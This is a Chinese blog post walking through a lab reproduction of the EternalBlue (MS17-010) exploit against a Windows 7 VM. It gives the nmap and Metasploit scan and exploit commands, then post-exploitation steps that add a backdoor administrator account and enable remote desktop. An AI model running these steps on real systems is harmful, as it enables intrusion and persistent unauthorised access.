Loading

永恒之蓝漏洞(445端口)详细利用过程

永恒之蓝(445端口)完整利用过程

     前几天有一次比赛的时候接触到了永恒之蓝漏洞,之前也没复现过永恒之蓝漏洞,在查资料方面花费了很多时间,就想着写篇博客记录一下。

前置环境:

​ kali,win7虚拟机,msf(kali自带)

一 · 扫描网络中存活主机

使用命令:

netdiscover -i eth0 -r 192.168.1.1/24

PS:由于这里使用的是虚拟机,所以网卡显示为 VMware

二 · 扫描当前主机存活端口

使用命令:

nmap -sV -n 192.168.1.1

三 · 开启MSF并利用搜索并检测是否能利用永恒之蓝

开启MSF:

msfconsole

检测永恒之蓝是否能利用 :

search ms17-010

use auxiliary/scanner/smb/smb_ms17_010

set RHOST 192.168.1.2

经过检测可以发现永恒之蓝漏洞可以利用

四 · 利用永恒之蓝漏洞

use exploit/windows/smb/ms17_010_eternalblue

剩下的命令不再做文本解释

成功获得shell

=================================================================

so,获得shell之后应该做什么呢???

新建一个用户,以便下次访问。并将该用户升为管理员权限,这样就可以拥有更大的权限了

新建用户并添加到管理员中

net user taotao 123 /add
net localgroup administrators taotao /add

查看是否成功操作

net user 查看本地用户列表
net localgroup administrators

但是光有shell权限太不方便了,再开启一个3389方便远程连接

远程连接之前需要判断对方用户在不在线

开启远程桌面服务

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
posted @ 2021-12-07 14:03  k1115h0t  阅读(4753)  评论(0编辑  收藏  举报